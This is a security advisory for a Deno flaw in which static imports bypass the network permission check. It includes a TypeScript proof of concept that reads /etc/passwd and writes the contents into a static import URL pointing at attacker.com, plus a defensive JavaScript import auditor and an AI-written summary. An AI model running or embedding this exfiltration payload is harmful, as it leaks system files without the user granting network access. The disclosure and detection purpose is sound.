Deno vulnerable to Exposure of Sensitive Information to an Unauthorized Actor
Description
Summary
Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network.
Details
Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code is directly/indirectly executed with deno run:
- The simplest payload would be a tracking pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code.
- When --allow-write and --allow-read permissions are given, an attacker can perform a more sophisticated two-step attack: first, they generate a ts/js file containing a static import, and in a second execution they load this static file.
PoC

```ts
// Resolve the path of the currently executing module.
const __filename = new URL("", import.meta.url).pathname;
// Needs --allow-read: read this file and the target file.
let oldContent = await Deno.readTextFile(__filename);
let passFile = await Deno.readTextFile("/etc/passwd");
// Build a static import whose URL carries the file contents in its query string.
let pre =
  'import {foo} from "https://attacker.com?val=' +
  encodeURIComponent(passFile) + '";\n';
// Needs --allow-write: prepend the import so the second run fetches it without --allow-net.
await Deno.writeTextFile(__filename, pre + oldContent);
```
Executing a file containing this payload twice with deno run --allow-read --allow-write causes the password file to leak over the network, even though no network permission was granted.
This vulnerability was fixed with the addition of the --allow-import flag: https://docs.deno.com/runtime/fundamentals/security/#network-access
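As an added example (not code from the advisory or the Deno project), the following JavaScript audits a module's static import specifiers before it is executed, listing remote imports and flagging the shape the PoC relies on: a module URL that carries data in its query string or points at a host outside the import allowlist. The default allowlist below is an assumption based on our reading of the Deno 2 --allow-import documentation; the sample source is constructed.

```javascript
// Added example, not code from the advisory or the Deno project: audit the
// static import specifiers of a module before `deno run` executes it.
// Assumption: the allowlist below mirrors the default hosts --allow-import
// accepts in Deno 2 as we understand the docs; replace it with your own policy.
const DEFAULT_IMPORT_ALLOWLIST = [
  "deno.land", "jsr.io", "esm.sh", "cdn.jsdelivr.net",
  "raw.githubusercontent.com", "gist.githubusercontent.com",
];

// Matches `import "x"`, `import ... from "x"` and `export ... from "x"`.
// Deliberately simple: it does not understand comments or template strings,
// so treat every hit as a candidate for review rather than a verdict.
const STATIC_IMPORT_RE =
  /^\s*(?:import\s*|(?:import|export)\b[^;'"]*?\bfrom\s*)["']([^"']+)["']/gm;

function auditStaticImports(source, allowlist = DEFAULT_IMPORT_ALLOWLIST) {
  const findings = [];
  for (const m of source.matchAll(STATIC_IMPORT_RE)) {
    const spec = m[1];
    if (!/^https?:/i.test(spec)) continue; // relative/bare specifier: no network
    const pos = m.index + m[0].indexOf(spec);
    const line = source.slice(0, pos).split("\n").length;
    let url;
    try { url = new URL(spec); } catch {
      findings.push({ specifier: spec, line, hostAllowed: false, suspicious: true });
      continue;
    }
    const hostAllowed = allowlist.includes(url.hostname);
    // A query string or fragment on a module URL is how the PoC smuggles
    // file contents out: the fetch happens even without --allow-net.
    const carriesData = url.search.length > 1 || url.hash.length > 1;
    findings.push({ specifier: spec, line, host: url.hostname, hostAllowed,
                    suspicious: !hostAllowed || carriesData });
  }
  return findings;
}

// Constructed sample: a legitimate std import, a local import and a line of
// the shape the PoC prepends (the "passwd" content here is a made-up string).
const SAMPLE_SOURCE = [
  'import { serve } from "https://deno.land/std/http/server.ts";',
  'import "./local.ts";',
  'import {foo} from "https://attacker.com?val=root%3Ax%3A0%3A0";',
].join("\n");

for (const finding of auditStaticImports(SAMPLE_SOURCE)) console.log(finding);
```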
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Deno's static imports bypass network permission checks, allowing attackers to leak sensitive files like /etc/passwd when read and write permissions are granted.
CVE-2024-21486 describes a vulnerability in the Deno runtime where static imports are exempted from the network permission check [1][2]. This means that even when a user does not grant --allow-net, code executed with deno run can still make network requests through static import statements, violating Deno's security model.
An attacker can exploit this by crafting a script that reads a sensitive file (e.g., /etc/passwd) and then writes a new static import statement that includes the file contents as part of the import URL. This two-step attack requires both --allow-read and --allow-write permissions but does not require --allow-net [2]. The proof-of-concept demonstrates reading the password file and embedding it into a static import URL that points to an attacker-controlled server [2].
The impact is that an attacker can exfiltrate sensitive local files to a remote server without the user explicitly granting network access. This bypasses Deno's permission system and can lead to information disclosure [1][2].
The vulnerability was fixed by introducing the --allow-import flag, which provides granular control over static import operations [2]. Users are advised to update to a version of Deno that includes this fix and to review their permission grants carefully.
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| deno (crates.io) | < 2.0.0 | 2.0.0 |